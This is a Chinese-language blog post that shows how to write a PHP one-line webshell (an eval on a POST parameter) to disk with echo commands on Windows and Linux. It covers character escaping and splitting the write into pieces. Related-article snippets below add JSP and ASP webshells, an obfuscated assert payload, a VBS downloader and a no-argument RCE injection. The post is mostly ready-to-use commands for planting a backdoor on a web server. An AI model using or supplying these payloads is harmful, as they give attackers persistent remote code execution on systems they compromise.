Echo写入一句话木马+分段写入

已于 2022-11-20 11:14:47 修改
阅读量2.5k 收藏 5
点赞数 4
分类专栏: echo写文件 文章标签: php 安全漏洞
于 2022-11-20 11:12:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43457035/article/details/127946500
版权

Echo写入一句话木马+分段写入

1、windows

echo ^<? php @eval($_POST['123']); ?^> > shell.php

echo ^<? php @eval($_POST['123']);?^> >> shell.php

在这里插入图片描述
在这里插入图片描述

补充点:(1)^以转义字符的身份出现。因为在cmd环境中,有些字符具备特殊功能,如>、>>表示重定向,|表示管道,&、&&、||表示语句连接……它们都有特定的功度能,如果需要把它们作为字符输出知的话,echo >、echo | ……之类的写法就会出错——cmd解释器会把它们作为具有特殊功能的字符对待,而不会作为普通字符处理,这个时候,就需道要对这些特殊字符做转义处理:在每个特殊字符回前加上转义字符^答,因此,要输出这些特殊字符,就需要用 echo ^>、echo ^|、echo ^|^|、echo ^^……之类的格式来处理。此处转义<和>

(2) 此处^为什么不换成引号?因为windows写入时会把引号写进去

2、linux

echo '<?php @eval($_POST["123"]); ?>' > 1.php

echo '<?php @eval($_POST["123"]); ?>' >> 1.php

在这里插入图片描述

补充点:$为linux系统的变量符号,原样输出字符串,不进行转义或取变量用单引号(此处否则会把$_POST当成变量处理),123用双引号是为了和单引号区分,如果里外都使用单引号,会导致报错

3、Echo分段写入

echo '<?php ' > 1.php       #先写入php头		

echo '@eval(' >> 1.php      #追加内容

echo '$_POST["1"]);?>' >> 1.php  #追加最后部分内容

在这里插入图片描述

晓霞1111
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用无参数的RCE注入一个一句话木马
qq_51553814的博客
10-22 3376
昨天做了一个无参数注入RCE的题,学到后面发现还可以直接用RCE一个一句话木马进去 今天来总结一下 以下是源码 <?php header("content-type:text/html;charset=utf-8"); if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { echo "error"; } highlight_file
田靖宇-day181
08-04
常见的一句话木马php、asp、aspx 等多种形式,攻击者可以直接将这些语句插入到网站上的某个文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。 一句话木马的基本原理 一句话...
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
Windows和Linux下写入一句话PHP木马echo命令总结
weixin_40650190的博客
04-16 1万+
1.Windows: echo ^<?php @eval($_POST['x']); ?^> >shell.php 知识点:^以转义字符的身份出现。因为在cmd环境中,有些字符具备特殊功能,如>、>>表示重定向,|表示管道,&、&&、||表示语句连接……它们都有特定的功度能,如果需要把它们作为字符输出知的话,echo >、ec...
一句话木马
Anton__1的博客
05-05 335
#一句话木马 传统防护检测的的免杀方法: 一、隐藏关键字 绕过php代码标志<?的限制: <script language="php">@eval($_POST['x'])</script> 拆分拼接: <?php $arr=explode(",","a,s,d,f,s,d,e,k,r,t"); //把字符串打散为数组 $payload=$arr[0].$arr[1].$arr[4].$arr[6].$arr[8].$arr[9];//拼接成assert //php版本
cmd 中echo 写入vbs下载者木马
ShadowAssassin的专栏
11-30 2226
转:http://www.hackseo.net/post/131.html Sub download(url,target) iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) Set xPost=createObject("Microsoft.XMLHTTP") xPost.Open "
JSP一句话木马
热门推荐
我的
12-11 2万+
JSP一句话木马  2011-01-13 21:39:42|  分类: 网络技巧 |  标签:jsp  木马  |字号大中小 订阅 1》jsp页面代码 if(req[wiki]UE[/wiki]st.getParameter("f")!=null)(new java.io.FileOutputStream(application.get
php后门木马常用命令.pdf
10-10
* shell_exec 函数:可以执行系统命令,并将输出结果以字符串形式返回,例如`echo shell_exec($_GET['cmd']);` * exec 函数:可以执行系统命令,并将输出结果以数组形式返回,例如`exec($_GET['cmd'],$arr); print_r...
linux上通过sh方式启动java jar程序并做为守护进程
04-09
> /path/to/logfile.pid`将Java进程的PID(进程ID)写入到指定的日志文件,这样我们就可以在需要时找到并管理这个进程。 7. 最后的`tail -f`命令用于实时查看应用的日志输出,但这不是必需的,可以根据实际需求决定...
Do All in Cmd Shell (一切尽在命令行)
02-04
一般的ASP木马“体积”较大,不适合直接用echo命令写入文件,这里我提供一个小巧的。 直接给出echo版: @echo ^("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server...
一句话木马的深入理解
giaogiao123的博客
08-08 891
我们都知道一句话木马比如说 <?php @eval($_POST['cmd']);?> 我们平常的认知都是去写入一句话木马到一个php文件或者是jsp文件,然后连接那个文件的目录,实际上,不需要写入文件,我们照样可以利用eval函数造成一句话的形成最后拿下网站webshell demo <?php if(isset($_GET['c'])){ $c = $_GET['c']; eval($c); }else{ highlight_file(__FILE_
linux命令——echo
weixin_34248705的博客
11-12 143
这次主要讲述echo的一个基本使用语法,echo在渗透测试中也是经常使用的,我们可以通过一个简单的shell来使用echo写入一个一句话木马,或者通过echo将linux的公钥写入到远程服务器中作为认证key,从而实现免密登录,另外通过echo还可以执行系统命令! echo最基本的就是作为输出,基本使用语法如下: 1 ...
一个Jsp的木马文件
tasty
09-10 3956
<%! /** * Code By Ninty * Date 2009-12-17 * Blog http://www.Forjj.com/ * Yue . I Love You. */ private static final String PW = "ninty"; //password private st
linux 下echo命令写入文件内容
weixin_30443813的博客
06-21 313
http://blog.csdn.net/xukai871105/article/details/35834703 echo"Raspberry">test.txt 转载于:https://www.cnblogs.com/icode-girl/p/5605027.html
Web安全-一句话木马
最新发布
jennycisp的博客
12-25 2676
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面中获得attack这个参数值。
CMD一句话木马
m0_49972294的博客
12-22 2952
linux: echo -e "<?@include(\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c win: echo ^<%eval request("c")%^> >>webshell.cc.asp 会再同目录下生成webshell.cc.asp一句话 密码:c ...
echo命令不换行输出的几种方式
qq_49283465的博客
01-08 3903
简述在命令执行中,分块写入一句话木马echo -n "不换行输出"echo -e "字符串\c"\c 最后不加上换行符号;
怎么使用echo写入文件
09-14
使用echo命令可以将文本内容写入文件。下面有几种使用echo命令写入文件的方法: 1. 使用">"指令覆盖文件原内容并重新输入内容,如果文件不存在则创建文件。例如,要将文本"#ifndef MAIN_H"写入main.h文件,可以使用以下命令:echo "#ifndef MAIN_H" > main.h。这将覆盖main.h文件的内容,并将"#ifndef MAIN_H"写入文件中。 2. 使用">>"指令向文件追加内容,原内容将被保留。继续上面的操作,要将文本"#define MAIN_H"追加到main.h文件中,可以使用以下命令:echo "#define MAIN_H" >> main.h。这将在main.h文件的末尾添加"#define MAIN_H"的内容。 3. 如果需要一次性写入多行,可以使用"-e"参数来处理转义字符。例如,要向main.h文件写入以下内容: #ifndef MAIN_H #define MAIN_H #endif 可以使用以下命令: echo -e "#ifndef MAIN_H\n#define MAIN_H\n\n#endif" > main.h。在这个例子中,"\n"被用来表示换行符,因为在echo命令中使用-e参数时,需要转义字符来表示特殊字符。 希望以上解释对您有所帮助。如果有任何进一步的问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值